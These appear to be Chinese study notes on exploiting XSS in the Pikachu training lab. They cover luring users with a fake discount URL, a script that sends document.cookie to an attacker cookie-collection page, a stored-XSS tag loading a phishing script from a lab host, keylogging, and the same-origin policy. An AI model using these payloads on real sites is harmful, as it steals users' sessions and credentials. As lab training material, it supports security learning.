漏洞.doc
cookie获取xss后台使用
引发用户点击特制url(比如告诉用户这是优惠网),用户点击后进入攻击者指定的自己的页面,返回用户的cookie到攻击者的后台
<script>
document .location='http://192.168.1.15/pkxss/xcookie/cookie.php?cookie='+ document.cookie;
</script>
构造的url指定链接是后台存储cookiede页面,页面可以重定向到其他页面,不引起用户的怀疑
xss钓鱼
代码
在存在存储型xss漏洞的留言板上输入:<script src="http://10.67.1.251/pikachu/pkxss/xfish.php" ></script>
xss获取键盘记录
同源策略:两个不同域名之间(跨域)不能使用js进行相互操作。如需进行跨域操作,要进行特殊配置,比如通过:header(“Access-Control-Allow-Origin:x.com) //允许被x.com跨域请求
下面这些标签不受同源策略限制:
<script src=”..”>//js,加载到本地
<img src=”..”>
<link href=”..”>//css
<iframe src=”..”>//任意资源